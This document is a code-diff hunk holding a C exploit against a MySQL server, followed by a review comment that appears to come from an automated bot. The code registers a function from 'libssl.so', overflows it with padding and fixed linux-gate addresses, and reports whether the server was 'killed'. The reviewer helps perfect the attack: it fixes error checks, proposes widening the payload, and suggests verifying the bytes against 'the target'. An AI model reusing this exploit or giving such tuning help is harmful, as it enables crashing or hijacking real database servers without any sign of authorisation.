@@ -, +, @@ * gcc -Wall -I /usr/include/mysql -L /usr/lib/mysql -lmysqlclient \ * -o mysql_udf mysql_udf.c * * Dou to the use of linux-gate, this example will only work on linux. * */ MYSQL mysql; char sql[1024]; int len; if(!mysql_init(&mysql)) { return -1; } mysql_options(&mysql, MYSQL_SET_CHARSET_NAME, "utf8"); if(!mysql_real_connect( &mysql, MY_HOST, MY_USER, MY_PASS, NULL, 0, NULL, 0) ) { fprintf(stderr, "%s\n", mysql_error(&mysql)); exit(EXIT_FAILURE); } len = snprintf(sql, sizeof(sql), "create function ssl2_enc returns integer soname 'libssl.so'" ); if(mysql_real_query(&mysql, sql, len) < 0) { fprintf(stderr, "%s\n", mysql_error(&mysql)); exit(EXIT_FAILURE); } len = snprintf(sql, sizeof(sql), "select ssl2_enc(\"" "AAAAAAAAAAAAAAAAAAAAAA%c%c%c%cAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAA%c%c%c%cAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAA%c%c%c%cAAAAAAAAAAAAAAAAAAAAAAAAAA" 0xff, 0xe0, 0xff, 0xff, // any pointer with whatever value is OK. 0x3c, 0xe0, 0xff, 0xff, // call addr + 0x18 // 0xffffe03c + 0x18 -> 0xffffe400 -> __kernel_vsyscall 0x09, 0xe1, 0xff, 0xff // addr - 0xac ); mysql_real_query(&mysql, sql, len); len = snprintf(sql, sizeof(sql), "drop function ssl2_enc"); if(mysql_real_query(&mysql, sql, len) < 0) { fprintf(stderr, "You just killed the server!\n"); exit(EXIT_FAILURE); } printf("It worked!\n"); exit(EXIT_SUCCESS);
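Review bot: The error checks around `create function` and `drop function` can never fire, because `mysql_real_query()` returns zero on success and a non-zero (positive) value on failure, so `if(mysql_real_query(&mysql, sql, len) < 0)` is always false and a rejected `CREATE FUNCTION` (no FILE privilege, `libssl.so` not in the plugin dir) silently falls through to the payload; the checks should read `if (mysql_real_query(&mysql, sql, len) != 0)`. The payload query itself is issued with no return check at all, and since the only failure signal is the later `drop function`, a plain server-side error is indistinguishable from the intended crash; capturing the result and printing `mysql_error()` there too would make the outcome readable. The `snprintf` results are also used as lengths without a truncation check against `sizeof(sql)`, which matters once the three `%c` groups are widened. Whether the server keeps the raw `0xff`/`0xe0` bytes intact after `MYSQL_SET_CHARSET_NAME` is set to `utf8` cannot be confirmed from the hunk and is worth verifying against the target. The enclosing function begins outside the hunk and its closing brace is not visible here.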